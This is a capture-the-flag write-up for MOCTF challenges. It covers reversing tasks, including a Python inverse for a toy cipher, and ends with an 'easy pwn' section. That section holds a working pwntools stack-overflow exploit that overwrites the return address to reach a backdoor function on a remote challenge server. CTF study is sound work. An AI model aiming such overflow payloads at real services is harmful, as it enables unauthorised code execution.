MOCTF-1

SO EASY

Although the program is large, the flag is visible directly in the main function.

跳跳跳 (Jump Jump Jump)

Yet another 🎲 dice game, same as always: just nop out the check, then base64-decode the string it prints at the end to get the flag.

暗恋的苦恼 (The Trouble with a Secret Crush)

We are given the encryption program, the ciphertext and the key, and have to recover the plaintext.

Open it in IDA and locate the encryption function:

```c
v7 = strlen(a1);          // plaintext length
v6 = strlen(a2);          // key length
v4 = 0;                   // key index
v3 = operator new(0xFFu);
for ( i = 0; i < v7; ++i )
{
  if ( v4 == v6 )         // key exhausted: wrap to the start
    v4 = 0;
  v3[i] = sub_401005(a1[i], a2[v4++]);
}
v3[i] = 0;
return v3;
```

Each byte of the key operates on one byte of the plaintext; when the key is used up it starts again from the beginning.
sub_401005:

```c
v4 = toupper(a1);         // plaintext byte
v5 = toupper(a2);         // key byte
if ( v4 == ' ' )
  return v4;
for ( i = 0; i < v4 - 65; ++i )
  ++v5;                   // v5 += v4 - 'A'
if ( v5 > 90 )
  result = v5 - 25;       // wrap past 'Z' (note: 25, not 26)
else
  result = v5;
return result;
```

toupper converts to upper case. So v5 += v4 - 65, and the return value then depends on the value of v5. However, I could not work out how to cleanly invert this part:

```c
if ( v5 > 90 )
  result = v5 - 25;
else
  result = v5;
```

so I simply wrote out both cases… Combined with the meaningful hints in the challenge, that should count as an approach too, lol:

```python
# Case 1: the key byte never went past 'Z', so v5 is the ciphertext byte itself.
mingwen = ""
miwen = "QWDRILDWNTW"
miyao = "ILOVEMOCTF"
for i in range(len(miwen)):
    v5 = ord(miwen[i])
    v4 = 65 + v5 - ord(miyao[i % len(miyao)])  # key wraps at strlen(key), as in the decompiled loop
    mingwen += chr(v4)
print(mingwen)

# Case 2: the key byte wrapped, so add the 25 back before undoing the shift.
mingwen = ""
for i in range(len(miwen)):
    v5 = ord(miwen[i]) + 25
    v4 = 65 + v5 - ord(miyao[i % len(miyao)])
    mingwen += chr(v4)
print(mingwen)
```
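The branch above is ambiguous only when both cases yield a letter, and since the wrap subtracts 25 rather than 26 that happens exactly when the ciphertext byte equals the key byte. The following is an added example (not the author's script) that ports sub_401005 and the outer loop exactly and inverts them by enumerating every plaintext byte that could produce each ciphertext byte; the `candidates`, `decrypt_unique` and `encrypt` names are my own.

```python
# Added example: exact port of the decompiled cipher plus a candidate-based inverse.

def enc_char(p, k):
    """Port of sub_401005: shift the key letter by (plaintext - 'A')."""
    v4, v5 = ord(p.upper()), ord(k.upper())
    if v4 == ord(' '):
        return ' '
    v5 += max(v4 - 65, 0)        # the for-loop of ++v5 only runs while v4 > 'A'
    return chr(v5 - 25) if v5 > 90 else chr(v5)

def encrypt(plain, key):
    """Port of the outer loop: the key index wraps when it reaches strlen(key)."""
    out, v4 = [], 0
    for ch in plain:
        if v4 == len(key):
            v4 = 0
        out.append(enc_char(ch, key[v4]))
        v4 += 1
    return ''.join(out)

def candidates(cipher, key):
    """Per ciphertext byte: every upper-case letter or space that encrypts to it."""
    alphabet = [chr(c) for c in range(65, 91)] + [' ']
    result = []
    for i, c in enumerate(cipher):
        k = key[i % len(key)]
        result.append([p for p in alphabet if enc_char(p, k) == c])
    return result

def decrypt_unique(cipher, key):
    """Join the candidates; '?' marks a position that is genuinely ambiguous."""
    return ''.join(c[0] if len(c) == 1 else '?' for c in candidates(cipher, key))

if __name__ == '__main__':
    # ciphertext and key taken from the challenge
    ct, key = "QWDRILDWNTW", "ILOVEMOCTF"
    print(candidates(ct, key))
    print(decrypt_unique(ct, key))
```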

crakeme2

A simple XOR. Reversing it gives a string of hex digits; decode them as ASCII to get the flag.

you get flag, but it … -1s? XD

easy pwn

Stack overflow:

```c
char s; // [esp+4h] [ebp-14h]

gets(&s);        // unbounded read into a 0x14-byte stack buffer
return puts(&s);
```

Backdoor function:

```
.text:0804850B                 public success
.text:0804850B success proc near
.text:0804850B ; __unwind {
.text:0804850B push ebp
.text:0804850C mov ebp, esp
.text:0804850E sub esp, 8
.text:08048511 sub esp, 0Ch
.text:08048514 push offset s ; "you success gets flag"
.text:08048519 call _puts
.text:0804851E add esp, 10h
.text:08048521 sub esp, 0Ch
.text:08048524 push offset command ; "cat flag"
.text:08048529 call _system
.text:0804852E add esp, 10h
.text:08048531 nop
.text:08048532 leave
.text:08048533 retn
.text:08048533 ; } // starts at 804850B
```

Script:

```python
from pwn import *

sh = remote("139.199.177.55", 10001)
sh.recvuntil(b"easy?\n")
success = 0x0804850b                     # address of the backdoor function above
payload = b'a' * 0x18 + p32(success)     # 0x14 bytes of buffer + 4 bytes saved ebp
sh.sendline(payload)
sh.interactive()
```